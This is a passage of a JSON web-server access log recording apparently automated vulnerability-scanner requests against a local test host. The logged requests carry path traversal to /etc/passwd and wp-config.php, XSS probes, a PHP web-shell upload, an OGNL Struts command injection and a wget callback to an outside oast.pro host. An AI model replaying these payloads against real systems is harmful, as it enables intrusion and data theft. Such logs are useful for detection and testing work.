i=0;i\x0D\x0A-----------------------------24464570528145\x0D\x0AContent-Disposition: form-data; name=\x22path\x22\x0D\x0A\x0D\x0A29N5EhVS1u959dFlPauMqL17bVU.jsp\x0D\x0A-----------------------------24464570528145--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /get_dkey.php?user=admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /host.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?p=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/29N5EhVS1u959dFlPauMqL17bVU.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysql.initial.sql HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/sdcall/Login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:55 +0000","request_body":"------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0AwmuUploadFiles\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22wmu_nonce\x22\x0D\x0A\x0D\x0A{{wmuSecurity}}\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22wmuAttachmentsData\x22\x0D\x0A\x0D\x0Aundefined\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22wmu_files[0]\x22; filename=\x22rce.php\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\xFF\xD8\xFF\xE1jExifMM*\xFD\xFD\xFDi\xFD\xFD>\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xA8\xFD\xFD\xFD\xFD\xC0\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFF\xE0\xFDJFIF\xFD\xFD\xFD\xFD\xFF\xDBC\xFD\xFD\x0C\xFD\x0C\x0A\xFD\xFD\x0D\x0A\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22postId\x22\x0D\x0A\x0D\x0A1\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/Home/uploadify/fileList?type=.+&path=../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.backup HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /private-key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SSI/index.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /trace HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.save HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow>\x0D\x0A ]>\x0D\x0A\x0D\x0AJohn\x0D\x0A&ent;\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/api/product/manger/getInfo HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SAPIrExtHelp/random/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/httpRequests/http-requests-log.http HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:02 +0000","request_body":"username=%3Cimg%2Fsrc%2Fonerror%3Dalert%28document.domain%29%3E&password=test","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cas/v1/tickets/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/29N5EejbaLIsK4qSXcUVBggGjJ1/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cluster/cluster HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///apps HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /httptrace HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:02 +0000","request_body":"radioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F29N5EkSbzqZJtMwnqiOfeUBpT6Q.php","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:02 +0000","request_body":"name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /integration/saveGangster.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/14 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ALFA_DATA/alfacgiapi/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/httpRequests/http-client.cookies HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/login/page HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/29N5EejbaLIsK4qSXcUVBggGjJ1/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /base64/PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/httptrace HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CgiStart?page=Single HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29N5EkSbzqZJtMwnqiOfeUBpT6Q.php?cmd=sudo%20rpm%20--eval%20'%25%7Blua:os.execute(%22wget%20http://ca2tuc8smpv1g2s80ca07tqjqetkfjhwf.oast.pro%22)%7D' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ampps/index.php?act=login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/public/info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) 